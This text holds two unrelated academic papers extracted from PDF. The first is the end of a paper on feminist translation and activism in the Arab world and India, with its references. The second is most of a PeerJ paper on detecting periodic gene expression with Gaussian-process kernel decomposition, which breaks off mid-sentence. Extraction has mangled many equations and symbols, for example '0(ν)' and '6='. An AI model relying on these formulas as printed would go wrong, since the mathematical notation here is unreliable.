equivalents to the latest feminist trends. The act of naming and renaming is what turns feminist translation into activism in public life. In post Arab Spring Egypt a similar debate was launched through the insistence of female protesters on discussing the issue of sexual harassment, bringing a formerly taboo subject into the light and forcing governments to legislate against it. It seems that young activists in the Arab world and India have moved past the “triple bind” (Jayawardena, 1985) created by male-centred imperialists, nationalists and religious revivalist discourse. These women are engaging in a post-postcolonial discourse that doesn’t seem as burdened with disentangling feminism from a historical relationship with the West. They seem to have made a clear distinction between the geographical state of feminists located in the post-colony, and the intellectual stand of postcolonial feminism, and wholly embraced being “in-translation”, which Devika (2008) describes as the capacity to combine . . . [the faithful and grounded modes of translation] in politically fruitful ways”. This can be seen in the increasingly emboldened use of art-activism and social media tools to re-appropriate a space for women that is not dictated by male politicians or an over-burdened post colonialist feminist agenda. Campaigns such as the Blank Noise Project, started as a student project in a Bangalore art school in 2003 and has since then developed into an international vehicle for “changing public attitudes towards sexual violence.” Regardless of what local or translated terms we give them, the new wave of activists in India and the Arab world seem to be the modern embodiment of Cesar Chavez’s words, “You cannot oppress the people who are not afraid anymore . . . We have seen the future and it is ours” (Chavez, 1984). REFERENCES Abu-Lughod L. Do Muslim women really need saving? Anthropological reflections on cultural relativism and its others. Am Anthropol. 2002;1(3):783–790. Ahmed L. Women and Gender in Islam. New Haven: Yale University Press; 1992. Al-Bazie S. 2014. Youtube video. Retrieved from https://youtu.be/SKIPrwiL1y4 Al-Dabbagh M, Ramadan A. Translating “gender” in the Arab world: Implications for public policy (in Arabic). Idafat: Arab J Soc. 2013;23(24):118–140. Al-Khalili J. The House of Wisdom: How Arabic Science Saved Ancient Knowledge and gave us the Renaissance. London: Penguin; 2012. AlSultany E. Arabs and Muslims in the Media. New York: New York University Press; 2012. Amin Q. The Liberation of Women and the New Woman: Two Documents in the History of Egyptian Feminism. (Peterson, S. Trans.). Cairo: The American University in Cairo Press (Originally published in 1899 and 1900); 2000. Amireh A. Arab women writer’s problems and prospects. Al-Jadid. 1996;2(10):36–40. Banerji R. Why Kali wont rage, a critique of Indian feminism. Gender Forum. 2012;38, http://www.genderforum.org/issues/ passages-to-india/why-kali-wont-rage/ Bassnett S, Trivedi H. Postcolonial Translation: Theory and Practice. London: Routledge; 1999. Page 7 of 8 Alsharekh. QScience Connect 2016:tii.2 https://youtu.be/skiprwil1y4 http://www.genderforum.org/issues/passages-to-india/why-kali-wont-rage/ http://www.genderforum.org/issues/passages-to-india/why-kali-wont-rage/ Boothe M. Egyptian women writers in English translation. In: Classe O, ed. Encyclopedia of Literary Translation into English: A-L. Volume 1. Chicago, IL: Fitzroy Dearborn; 2002:385–400. Chakravarty R. Translating Tagore: Shifting paradigms. In: Banjeri D, ed. Rabindranath Tagore in the 21st Century: Theoretical Renewals. New Delhi: Springer; 2015:26–40. Chamberlain L. Gender and the metaphorics of translation. Signs. 1988;13(3):454–472. Chavez C. Address to the commonwealth club in California. Retrieved from http://www.chavezfoundation.org/_cms.php? mode¼view&b_code¼001008000000000&b_no¼16&page¼1&field¼&key¼&n¼7; 1984, November 9. Cohen C. #RapAgainstRape: Two Indian women rapping about rape go viral. The Telegraph, http://www.telegraph.co.uk/ women/womens-life/11480522/RapAgainstRape-Indian-girls-rape-rap-video-has-gone-viral.html 2015, March 18. De Beauvoir S. The Second Sex. (Borde, C., Trans.). New York: First Vantage Books. (Original work published 1949); 2011. Devika J. Being “in-translation” in a post-colony. Transl Stud. 2008;2(2):182–196. Gebeily M. Meet Estaygazat, Syria’s online feminist movement. al-Monitor, http://www.al-monitor.com/pulse/originals/ 2015/03/syria-women-estayqazat-movement-sexuality.html; 2015, March 16. Hatim B, Munday J. Translation: An Advanced Resource Book. London: Routledge; 2004. Jayawardena K. Feminism and Nationalism in the Third World. London: Zed Books; 1985. Kothari R. Translating India. London, UK: Routledge; 2014. Lorde A. The master’s tools will never dismantle the master’s house. Sisters Outsiders: Essays and Speeches. (2007) ed. Berkley, CA: Crossing Press; 1984:110–114. Mernissi F. The Forgotten Queens of Islam. Polity Press; 1994. Mitchell J. Women, the Longest Revolution. New York: Pantheon Books; 1984. Moghadam V. Modernizing Women: Gender and Social Change in the Middle East. Boulder, CO: Lynne Reiner; 2003. Moure E, Translation is a Political Act. Youtube Video. Retrieved from http://www.youtube.com/watch?v¼Bhv9BnipBAg 2012. Munday J. The Routledge Companion to Translation Studies. London: Routledge; 2009. Pandey I. Romantic Feminism in Hindi Novels Written by Women. House of Letters; 1989. Rape: It’s Your Fault. Youtube Video. Retrieved from https://www.youtube.com/watch?v¼8hC0Ng_ajpY Sadiqi F. Women, Gender, and Language in Morocco. Leiden: Brill; 2002. Safar Online. Website. http://www.sikhfeministresearch.org Simon S. Gender in Translation: Cultural Identity and the Politics of Transmission. London and New York: Routledge; 1996. Spivak G. A Critique of Postcolonial Reason: Towards a History of the Vanishing Present. Harvard University Press; 1999. Spivak G. The politics of translation. In: Bal M, ed. Narrative Theory: Political Narratology. Routledge; 2004:146–151. The Blank Noise Project. Srishti University website http://srishti.ac.in/centers-and-labs/blank-noise Page 8 of 8 Alsharekh. QScience Connect 2016:tii.2 http://www.chavezfoundation.org/_cms.php?mode=view&b_code=001008000000000&b_no=16&page=1&field=&key=&n=7 http://www.chavezfoundation.org/_cms.php?mode=view&b_code=001008000000000&b_no=16&page=1&field=&key=&n=7 http://www.telegraph.co.uk/women/womens-life/11480522/rapagainstrape-indian-girls-rape-rap-video-has-gone-viral.html http://www.telegraph.co.uk/women/womens-life/11480522/rapagainstrape-indian-girls-rape-rap-video-has-gone-viral.html http://www.al-monitor.com/pulse/originals/2015/03/syria-women-estayqazat-movement-sexuality.html http://www.al-monitor.com/pulse/originals/2015/03/syria-women-estayqazat-movement-sexuality.html http://www.youtube.com/watch?v=bhv9bnipbag https://www.youtube.com/watch?v=8hc0ng_ajpy http://www.sikhfeministresearch.org http://srishti.ac.in/centers-and-labs/blank-noise work_dhfbsrtekzhwpbhp5vvyoh5mvq ---- Submitted 2 October 2015 Accepted 28 February 2016 Published 13 April 2016 Corresponding author Nicolas Durrande, durrande@emse.fr Academic editor Kathryn Laskey Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.50 Copyright 2016 Durrande et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Detecting periodicities with Gaussian processes Nicolas Durrande1, James Hensman2, Magnus Rattray3 and Neil D. Lawrence4 1 Institut Fayol—LIMOS, Mines Saint-Étienne, Saint-Étienne, France 2 CHICAS, Faculty of Health and Medicine, Lancaster University, Lancaster, United Kingdom 3 Faculty of Life Sciences, University of Manchester, Manchester, United Kingdom 4 Department of Computer Science and Sheffield Institute for Translational Neuroscience, University of Sheffield, Sheffield, United Kingdom ABSTRACT We consider the problem of detecting and quantifying the periodic component of a function given noise-corrupted observations of a limited number of input/output tuples. Our approach is based on Gaussian process regression, which provides a flexible non-parametric framework for modelling periodic data. We introduce a novel decomposition of the covariance function as the sum of periodic and aperiodic kernels. This decomposition allows for the creation of sub-models which capture the periodic nature of the signal and its complement. To quantify the periodicity of the signal, we derive a periodicity ratio which reflects the uncertainty in the fitted sub-models. Although the method can be applied to many kernels, we give a special emphasis to the Matérn family, from the expression of the reproducing kernel Hilbert space inner product to the implementation of the associated periodic kernels in a Gaussian process toolkit. The proposed method is illustrated by considering the detection of periodically expressed genes in the arabidopsis genome. Subjects Data Mining and Machine Learning, Optimization Theory and Computation Keywords RKHS, Harmonic analysis, Circadian rhythm, Gene expression, Matérn kernels INTRODUCTION The periodic behaviour of natural phenomena arises at many scales, from the small wavelength of electromagnetic radiations to the movements of planets. The mathematical study of natural cycles can be traced back to the nineteenth century with Thompson’s harmonic analysis for predicting tides (Thomson, 1878) and Schuster’s investigations on the periodicity of sunspots (Schuster, 1898). Amongst the methods that have been considered for detecting and extracting the periodic trend, one can cite harmonic analysis (Hartley, 1949), folding methods (Stellingwerf, 1978; Leahy et al., 1983) which are mostly used in astrophysics and periodic autoregressive models (Troutman, 1979; Vecchia, 1985). In this article, we focus on the application of harmonic analysis in reproducing kernel Hilbert spaces (RKHS) and on the consequences for Gaussian process modelling. Our approach provides a flexible framework for inferring both the periodic and aperiodic components of sparsely sampled and noise-corrupted data, providing a principled means for quantifying the degree of periodicity. We demonstrate our proposed method on the problem of identifying periodic genes in gene expression time course data, comparing performance with a popular alternative approach to this problem. How to cite this article Durrande et al. (2016), Detecting periodicities with Gaussian processes. PeerJ Comput. Sci. 2:e50; DOI 10.7717/peerj-cs.50 https://peerj.com mailto:durrande@emse.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.50 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.50 Harmonic analysis is based on the projection of a function onto a basis of periodic functions. For example, a natural method for extracting the 2π-periodic trend of a function f is to decompose it in a Fourier series: f (x)→ fp(x)=a1sin(x)+a2cos(x)+a3sin(2x)+a4cos(2x)+··· (1) where the coefficients ai are given, up to a normalising constant, by the L2 inner product between f and the elements of the basis. However, the phenomenon under study is often observed at a limited number of points, which means that the value of f (x) is not known for all x but only for a small set of inputs {x1,...,xn}called the observation points. With this limited knowledge of f , it is not possible to compute the integrals of the L2 inner product so the coefficients ai cannot be obtained directly. The observations may also be corrupted by noise, further complicating the problem. A popular approach to overcome the fact that f is partially known is to build a mathematical model m to approximate it. A good model m has to take into account as much information as possible about f . In the case of noise-free observations it interpolates f for the set of observation points m(xi)= f (xi) and its differentiability corresponds to the assumptions one can have about the regularity of f . The main body of literature tackling the issue of interpolating spatial data is scattered over three fields: (geo-)statistics (Matheron, 1963; Stein, 1999), functional analysis (Aronszajn, 1950; Berlinet & Thomas-Agnan, 2004) and machine learning (Rasmussen & Williams, 2006). In the statistics and machine learning framework, the solution of the interpolation problem corresponds to the expectation of a Gaussian process, Z, which is conditioned on the observations. In functional analysis, the problem reduces to finding the interpolator with minimal norm in a RKHS H. As many authors pointed out (for example Berlinet & Thomas-Agnan (2004) and Scheuerer, Schaback & Schlather (2011)), the two approaches are closely related. Both Z and H are based on a common object which is a positive definite function of two variables k(.,.). In statistics, k corresponds to the covariance of Z and for the functional counterpart, k is the reproducing kernel of H. From the regularization point of view, the two approaches are equivalent since they lead to the same model m (Wahba, 1990). Although we will focus hereafter on the RKHS framework to design periodic kernels, we will also take advantage of the powerful probabilistic interpretation offered by Gaussian processes. We propose in this article to build the Fourier series using the RKHS inner product instead of the L2 one. To do so, we extract the sub-RKHS Hp of periodic functions in H and model the periodic part of f by its orthogonal projection onto Hp. One major asset of this approach is to give a rigorous definition of non-periodic (or aperiodic) functions as the elements of the sub-RKHS Ha=H⊥p . The decomposition H=Hp⊕Ha then allows discrimination of the periodic component of the signal from the aperiodic one. Although some expressions of kernels leading to RKHS of periodic functions can be found in the literature (Rasmussen & Williams, 2006), they do not allow to extract the periodic part of the signal. Indeed, usual periodic kernels do not come with the expression of an aperiodic kernel. It is thus not possible to obtain a proper decomposition of the space as the direct sum of periodic and aperiodic subspaces and the periodic sub-model cannot be rigorously obtained. Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 2/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50 Figure 1 Plots of the benchmark test functions, observation points and fitted models. For an improved visibility, the plotting region is limited to one period. The RMSE is computed using a grid of 500 evenly spaced points spanning [0,3], and the values indicated on each subplot correspond respectively to COSOPT, the periodic Gaussian process model and linear regression. The Python code used to generate this figure is provided as Jupyter notebook in Supplemental Information 3. The last part of this introduction is dedicated to a motivating example. In ‘Kernels of Periodic and Aperiodic Subspaces,’ we focus on the construction of periodic and aperiodic kernels and on the associated model decomposition. ‘Application to Matérn Kernels’ details how to perform the required computations for kernels from the Matérn familly. ‘Quantifying the Periodicity t’ introduces a new criterion for measuring the periodicity of the signal. Finally, the last section illustrates the proposed approach on a biological case study where we detect, amongst the entire genome, the genes showing a cyclic expression. The examples and the results presented in this article have been generated with the version 0.8 of the python Gaussian process toolbox GPy. This toolbox, in which we have implemented the periodic kernels discussed here, can be downloaded at http://github.com/SheffieldML/GPy. Furthermore, the code generating the Figs. 1–3 is provided in the Supplemental Information 3 as Jupyter notebooks. Motivating example To illustrate the challenges of determining a periodic function, we first consider a benchmark of six one dimensional periodic test functions (see Fig. 1 and Appendix A). These functions include a broad variety of shapes so that we can understand the effect of shape on methods with different modelling assumptions. A set X =(x1,...,x50) of equally spaced observation points is used as training set and a N(0,0.1) observation noise is added to each evaluation of the test function: Fi= f (xi)+εi (or F = f (X)+ε with vector Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 3/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50/supp-3 http://github.com/SheffieldML/GPy http://dx.doi.org/10.7717/peerj-cs.50/supp-3 http://dx.doi.org/10.7717/peerj-cs.50 Figure 2 Examples of decompositions of a kernel as a sum of a periodic and aperiodic sub-kernels. (A) Matérn 3/2 kernel k(.,5). (B) Periodic sub-kernel kp(.,5). (C) Aperiodic sub-kernel ka(.,5). For these plots, one of the kernels variables is fixed to 5. The three graphs on each plot correspond to a different value of the lengthscale parameter `. The input space is D = [0,4π] and the cut-off frequency is q = 20. The Python code used to generate this figure is provided as Jupyter notebook in Supplemental Informa- tion 3. Figure 3 Decomposition of a Gaussian process fit. (A) full model m; (B) periodic portion mp and (C) aperiodic portion ma. Our decomposition allows for recognition of both periodic and aperiodic parts. In this case maximum likelihood estimation was used to determine the parameters of the kernel, we recov- ered (σ2p ,`p,σ 2 a ,`a)=(52.96,5.99,1.18,47.79). The Python code used to generate this figure is provided as Jupyter notebook in Supplemental Information 3. notations). We consider three different modelling approaches to compare the facets of different approaches based on harmonic analysis: • COSOPT (Straume, 2004), which fits cosine basis functions to the data, • Linear regression in the weights of a truncated Fourier expansion, • Gaussian process regression with a periodic kernel. COSOPT. COSOPT is a method that is commonly used in biostatistics for detecting periodically expressed genes (Hughes et al., 2009; Amaral & Johnston, 2012). It assumes the following model for the signal: y(x)=α+βcos(ωx+ϕ)+ε, (2) where ε corresponds to white noise. The parameters α, β, ω and ϕ are fitted by minimizing the mean square error. Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 4/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50/supp-3 http://dx.doi.org/10.7717/peerj-cs.50/supp-3 http://dx.doi.org/10.7717/peerj-cs.50/supp-3 http://dx.doi.org/10.7717/peerj-cs.50 Linear regression. We fit a more general model with a basis of sines and cosines with periods 1,1/2...,1/20 to account for periodic signal that does not correspond to a pure sinusoidal signal. y(x)=α+ 20∑ i=1 βicos(2πix)+ 20∑ i=1 γisin(2πix)+ε. (3) Again, model parameters are fitted by minimizing the mean square error which corresponds to linear regression over the basis weights. Gaussian Process with periodic covariance function. We fit a Gaussian process model with an underlying periodic kernel. We consider a model, y(x)=α+yp(x)+ε, (4) where yp is a Gaussian process and where α should be interpreted as a Gaussian random variable with zero mean and variance σ2α. The periodicity of the phenomenon is taken into account by choosing a process yp such that the samples are periodic functions. This can be achieved with a kernel such as kp(x,x ′)=σ2exp ( − sin2 ( ω(x−x′) ) ` ) (5) or with the kernels discussed later in the article. For this example we choose the periodic Matérn 3/2 kernel which is represented in Fig. 2B. For any kernel choice, the Gaussian process regression model can be summarized by the mean and variance of the conditional distribution: m(x)=E[y(x)|y(X) = F]=k(x,X)(k(X,X)+τ2I)−1F v(x)=Var[y(x)|y(X) = F]=k(x,x)−k(x,X)(k(X,X)+τ2I)−1k(X,x) (6) where k =σ2α+kp and I is the 50×50 identity matrix. In this expression, we introduced matrix notation for k: if A and B are vectors of length n and m, then k(A,B) is a n×m matrix with entries k(A,B)i,j =k(Ai,Bj). The parameters of the model (σ2α,σ 2,`,τ2) can be obtained by maximum likelihood estimation. The models fitted with COSOPT, linear regression and the periodic Gaussian process model are compared in Fig. 1. It can be seen that the latter clearly outperforms the other models since it can approximate non sinusoidal patterns (in opposition to COSOPT) while offering a good noise filtering (no high frequencies oscillations corresponding to noise overfitting such as for linear regression). The Gaussian process model gives an effective non-parametric fit to the different functions. In terms of root mean square error (RMSE) in each case, it is either the best performing method, or it performs nearly as well as the best performing method. Both linear regression and COSOPT can fail catastrophically on one or more of these examples. Although highly effective for purely periodic data, the use of a periodic Gaussian processes is less appropriate for identifying the periodic component of a pseudo- periodic function such as f (x)= cos(x)+0.1exp(−x). An alternative suggestion is Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 5/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50 to consider a pseudo-periodic Gaussian process y = y1+yp with a kernel given by the sum of a usual kernel k1 and a periodic one kp (see e.g., Rasmussen & Williams, (2006)). Such a construction allows decomposition of the model into a sum of sub- models m(x)=E[y1(x)|y(X) = F]+E[yp(x)|y(X) = F] where the latter is periodic (see ‘Decomposition in periodic and aperiodic sub-models’ for more details). However, the periodic part of the signal is scattered over the two sub-models so it is not fully represented by the periodic sub-model. It would therefore be desirable to introduce new covariance structures that allow an appropriate decomposition in periodic and non-periodic sub- models in order to tackle periodicity estimation for pseudo-periodic signals. KERNELS OF PERIODIC AND APERIODIC SUBSPACES The challenge of creating a pair of kernels that stand respectively for the periodic and aperiodic components of the signal can be tackled using the RKHS framework. We detail in this section how decomposing a RKHS into a subspace of periodic functions and its orthogonal complement leads to periodic and aperiodic sub-kernels. Fourier basis in RKHS We assume in this section that the space Hp spanned by a truncated Fourier basis B(x)= ( sin ( 2π λ x ) ,...,cos ( 2π λ qx ))> (7) is a subspace of the RKHS H. Under this hypothesis, it is straightforward to confirm that the reproducing kernel of Hp is kp(x,x ′)=B>(x)G−1B(x′) (8) where G is the Gram matrix of B in H: Gi,j = 〈 Bi,Bj 〉 H. Hereafter, we will refer to kp as the periodic kernel. In practice, the computation of kp requires computation of the inner product between sine and cosine functions in H. We will see in the next section that these computa- tions can be done analytically for Matérn kernels. For other kernels, a more comprehensive list of RKHS inner products can be found in Berlinet & Thomas-Agnan (2004, Chap. 7). The orthogonal complement of Hp in H can be interpreted as a subspace Ha of aperiodic functions. By construction, its kernel is ka =k−kp (Berlinet & Thomas-Agnan, 2004). An illustration of the decomposition of Matérn 3/2 kernels is given in Fig. 2. The decomposition of the kernel comes with a decomposition of the associated Gaussian process in to two independent processes and the overall decompositions can be summarised as follow: H=Hp ⊥ +Ha↔k=kp+ka↔y =yp y +ya. (9) Many stationary covariance functions depend on two parameters: a variance parameter σ2, which represents the vertical scale of the process and a lengthscale parameter, `, which represents the horizontal scale of the process. The sub-kernels ka and kp inherit these parameters (through the Gram matrix G for the latter). However, the decomposition k =kp+ka allows us to set the values of those parameters separately for each sub-kernel Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 6/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50 in order to increase the flexibility of the model. The new set of parameters of k is then (σ2p ,`p,σ 2 a ,`a) with an extra parameter λ if the period is not known. Such reparametrisations of kp and ka induce changes in the norms of Hp and Ha. However, if the values of the parameters are not equal to zero or +∞, these spaces still consist of the same elements so Hp∩Ha =∅. This implies that the RKHS generated by kp+ka corresponds to Hp+Ha where the latter are still orthogonal but endowed with a different norm. Nevertheless, the approach is philosophically different since we build H by adding two spaces orthogonally whereas in Eq. (9) we decompose an existing space H into orthogonal subspaces. Decomposition in periodic and aperiodic sub-models The expression y =yp+ya of Eq. (9) allows to introduce two sub-models corresponding to conditional distributions: a periodic one yp(x)|y(X) = F and an aperiodic one ya(x)|y(X) = F. These two distributions are Gaussian and their mean and variance are given by the usual Gaussian process conditioning formulas mp(x)=E[yp(x)|y(X) = F]=kp(x,X)k(X,X) −1F ma(x)=E[ya(x)|y(X) = F]=ka(x,X)k(X,X) −1F, (10) vp(x)=Var[yp(x)|y(X) = F]=kp(x,x)−kp(x,X)k(X,X) −1kp(X,x) va(x)=Var[ya(x)|y(X) = F]=ka(x,x)−ka(x,X)k(X,X) −1ka(X,x). (11) The linearity of the expectation ensures that the sum of the sub-models means is equal to the full model mean: m(x)=E[yp(x)+ya(x)|y(X) = F]=E[yp(x)|y(X) = F]+E[ya(x)|y(X) = F] =mp(x)+ma(x) (12) so mp and ma can be interpreted as the decomposition of m into it’s periodic and aperiodic components. However, there is no similar decomposition of the variance: v(x) 6=vp(x)+va(x) since yp and ya are not independent given the observations. The sub-models can be interpreted as usual Gaussian process models with correlated noise. For example, mp is the best predictor based on kernel kp with an observational noise given by ka. For a detailed discussion on the decomposition of models based on a sum of kernels, see Durrande, Ginsbourger & Roustant (2012). We now illustrate this model decomposition on the test function f (x)=sin(x)+x/20 defined over [0,20]. Figure 3 shows the obtained model after estimating (σ2p ,`p,σ 2 a ,`a) of a decomposed Matérn 5/2 kernel. In this example, the estimated values of the lengthscales are very different allowing the model to capture efficiently the periodic component of the signal and the low frequency trend. APPLICATION TO MATÉRN KERNELS The Matérn class of kernels provides a flexible class of stationary covariance functions for a Gaussian process model. The family includes the infinitely smooth exponentiated quadratic (i.e., Gaussian or squared exponential or radial basis function) kernel as well Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 7/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50 as the non-differentiable Ornstein–Uhlenbeck covariance. In this section, we show how the Matérn class of covariance functions can be decomposed into periodic and aperiodic subspaces in the RKHS. Matérn kernels k are stationary kernels, which means that they only depend on the distance between the points at which they are evaluated: k(x,y)= k̃(|x−y|). They are often introduced by the spectral density of k̃ (Stein, 1999): S(ω)= ( 0(ν)`2ν 2σ2 √ π0(ν+1/2)(2ν)ν ( 2ν `2 +ω 2 )ν+1/2)−1 . (13) Three parameters can be found in this equation: ν which tunes the differentiability of k̃, ` which corresponds to a lengthscale parameter and σ2 that is homogeneous to a variance. The actual expressions of Matérn kernels are simple when the parameterν is half-integer. For ν=1/2,3/2,5/2 we have k1/2(x,x ′)=σ2exp ( − |x−x′| ` ) k3/2(x,x ′)=σ2 ( 1+ √ 3|x−x′| ` ) exp ( − √ 3|x−x′| ` ) k5/2(x,x ′)=σ2 ( 1+ √ 5|x−x′| ` + 5|x−x′|2 3`2 ) exp ( − √ 5|x−x′| ` ) . (14) Here the parameters ` and σ2 respectively correspond to a rescaling of the abscissa and or- dinate axis. For ν=1/2 one can recognise the expression of the exponential kernel (i.e., the covariance of the Ornstein–Uhlenbeck process) and the limit case ν→∞ corresponds to the squared exponential covariance function (Rasmussen & Williams, 2006). As stated in Porcu & Stein (2012 Theorem 9.1) and Wendland (2005), the RKHS generated by kν coincides with the Sobolev space W ν+1/2 2 . Since the elements of the Fourier basis are C∞, they belong to the Sobolev space and thus to Matérn RKHS. The hypothesis Hp⊂H made in ‘Kernels of Periodic and Aperiodic Subspaces’ is thus fulfilled and all previous results apply. Furthermore, the connection between Matérn kernels and autoregressive processes allows us to derive the expression of the RKHS inner product. As detailed in Appendix B, we obtain for an input space D=[a,b]: Matérn 1/2 (exponential kernel) 〈 g,h 〉 H1/2 = ` 2σ2 ∫ b a ( 1 ` g+g ′ )( 1 ` h+h′ ) dt+ 1 σ2 g(a)h(a). (15) Matérn 3/2 〈 g,h 〉 H3/2 = `3 12 √ 3σ2 ∫ b a ( 3 `2 g+2 √ 3 ` g ′+g ′′ )( 3 `2 h+2 √ 3 ` h′+h′′ ) dt + 1 σ2 g(a)h(a)+ `2 3σ2 g ′(a)h′(a). (16) Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 8/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50 Matérn 5/2 〈 g,h 〉 H5/2 = ∫ b a Lt (g)Lt (h)dt+ 9 8σ2 g(a)h(a)+ 9`4 200σ2 g(a)′′h′′(a) + 3`2 5σ2 ( g ′(a)h′(a)+ 1 8 g ′′(a)h(a)+ 1 8 g(a)h′′(a) ) (17) where Lt (g)= √ 3`5 400 √ 5σ2 ( 5 √ 5 `3 g(t)+ 15 `2 g ′(t)+ 3 √ 5 ` g ′′(t)+g ′′′(t) ) . Although these expressions are direct consequences of Doob (1953) and Hájek (1962), they cannot be found in the literature to the best of our knowledge. The knowledge of these inner products allow us to compute the Gram matrix G and thus the sub-kernels kp and ka. A result of great practical interest is that inner products between the basis functions have a closed form expression. Indeed, all the elements of the basis can be written in the form cos(ωx+ϕ) and, using the notation Lx for the linear operators in the inner product integrals (see Eq. (17)), we obtain: Lx(cos(ωx+ϕ))= ∑ i αicos(ωx+ϕ) (i) = ∑ i αiω icos ( ωx+ϕ+ iπ 2 ) . (18) The latter can be factorised in a single cosine ρcos(ωx+φ) with ρ= √ r2c +r 2 s , φ= { arcsin(rs/ρ) if rc ≥0 arcsin(rs/ρ)+π if rc <0 (19) where rc = ∑ i αiω icos ( ϕ+ iπ 2 ) and rs= ∑ i αiω isin ( ϕ+ iπ 2 ) . Eventually, the computation of the inner product between functions of the basis boils down to the integration of a product of two cosines, which can be solved by linearisation. QUANTIFYING THE PERIODICITY The decomposition of the model into a sum of sub-models is useful for quantifying the periodicity of the pseudo-periodic signals. In this section, we propose a criterion based on the ratio of signal variance explained by the sub-models. In sensitivity analysis, a common approach for measuring the effect of a set of variables x1,...,xn on the output of a multivariate function f (x1,...,xn) is to introduce a random vector R=(r1,...,rn) with values in the input space of f and to define the variance explained by a subset of variables xI = (xI1,...,xIm) as VI =Var ( E ( f (R)|RI )) (Oakley & O’Hagan, 2004). Furthermore, the prediction variance of the Gaussian process model can be taken into account by computing the indices based on random paths of the conditional Gaussian process (Marrel et al., 2009). Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 9/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50 We now apply these two principles to define a periodicity ratio based on the sub-models. Let R be a random variable defined over the input space and yp, ya be the periodic and aperiodic components of the conditional process y given the data-points. yp and ya are normally distributed with respective mean and variance (mp, vp), (ma, va) and their covariance is given by Cov(yp(x),ya(x′))=−kp(x,X)k(X,X)−1ka(x′). To quantify the periodicity of the signal we introduce the following periodicity ratio: S= VarR[yp(R)] VarR[yp(R)+ya(R)] . (20) Note that S cannot be interpreted as a the percentage of periodicity of the signal in a rigorous way since VarR[yp(R)+ya(R)] 6=VarR[yp(R)]+VarR[ya(R)]. As a consequence, this ratio can be greater than 1. For the model shown in Fig. 3, the mean and standard deviation of S are respectively 0.86 and 0.01. APPLICATION TO GENE EXPRESSION ANALYSIS The 24 h cycle of days can be observed in the oscillations of biological mechanisms at many spatial scales. This phenomenon, called the circadian rhythm, can for example be seen at a microscopic level on gene expression changes within cells and tissues. The cellular mechanism ensuring this periodic behaviour is called the circadian clock. For arabidopsis, which is a widely used organism in plant biology and genetics, the study of the circadian clock at a gene level shows an auto-regulatory system involving several genes (Ding et al., 2007). As argued by Edwards et al. (2006), it is believed that the genes involved in the oscillatory mechanism have a cyclic expression so the detection of periodically expressed genes is of great interest for completing current models. Within each cell, protein-coding genes are transcribed into messenger RNA molecules which are used for protein synthesis. To quantify the expression of a specific protein-coding gene it is possible to measure the concentration of messenger RNA molecules associated with this gene. Microarray analysis and RNA-sequencing are two examples of methods that take advantage of this principle. The dataset (see http://millar.bio.ed.ac.uk/data.htm) considered here was originally studied by Edwards et al. (2006). It corresponds to gene expression for nine day old arabidopsis seedlings. After eight days under a 12 h-light/12 h-dark cycle, the seedlings are transferred into constant light. A microarray analysis is performed every four hours, from 26 to 74 h after the last dark-light transition, to monitor the expression of 22,810 genes. Edwards et al. (2006) use COSOPT (Straume, 2004) for detecting periodic genes and identify a subset of 3,504 periodically expressed genes, with an estimated period between 20 and 28 h. We now apply to this dataset the method described in the previous sections. The kernel we consider is a sum of a periodic and aperiodic Matérn 3/2 kernel plus a delta function to reflect observation noise: k(x,x′)=σ2p kp(x,x ′)+σ2a ka(x,x ′)+τ2δ(x,x′). (21) Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 10/18 https://peerj.com http://millar.bio.ed.ac.uk/data.htm http://dx.doi.org/10.7717/peerj-cs.50 Figure 4 Distribution of the periodicity ratio over all genes according to the Gaussian process mod- els. The cut-off ratio determining if genes are labelled as periodic or not is represented by a vertical dashed line. Although the cycle of the circadian clock is known to be around 24 h, circadian rhythms often depart from this figure (indeed circa dia is Latin for around a day) so we estimated the parameter λ to determine the actual period. The final parametrisation of k is based on six variables: (σ2p ,`p,σ 2 a ,`a,τ 2,λ). For each gene, the values of these parameters are estimated using maximum likelihood. The optimization is based on the standard options of the GPy toolkit with the following boundary limits for the parameters: σp, σa≥0; `p, `a∈[10, 60]; τ2∈[10−5,0.75]and λ∈[20, 28]. Furthermore, 50 random restarts are performed for each optimization to limit the effects of local minima. Eventually, the periodicity of each model is assessed with the ratio S given by Eq. (20). As this ratio is a random variable, we approximate the expectation of S with the mean value of 1,000 realisations. To obtain results comparable with the original paper on this dataset, we labeled as periodic the set of 3,504 genes with the highest periodicity ratio. The cut-off periodicity ratio associated with this quantile is S=0.76. As can be seen in Fig. 4, this cut-off value does not appear to be of particular significance according to the distribution of the Gaussian process models. On the other hand, the distribution spike that can be seen at S=1 corresponds to a gap between models that are fully-periodic and others. We believe this gap is due to the maximum likelihood estimation since the estimate of σ2a is zero for all models in the bin S=1. The other spike at S=0 can be interpreted similarly and it corresponds to estimated σ2p equal to zero. Durrande et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.50 11/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.50 Table 1 Confusion table associated to the predictions by COSOPT and the proposed Gaussian process approach. # of genes PGP PGP PCOSOPT 2,127 1,377 PCOSOPT 1,377 17,929 Figure 5 Comparison of Estimated periods for the genes in PGP ∩ PCOSOPT . The coefficient of determi- nation of 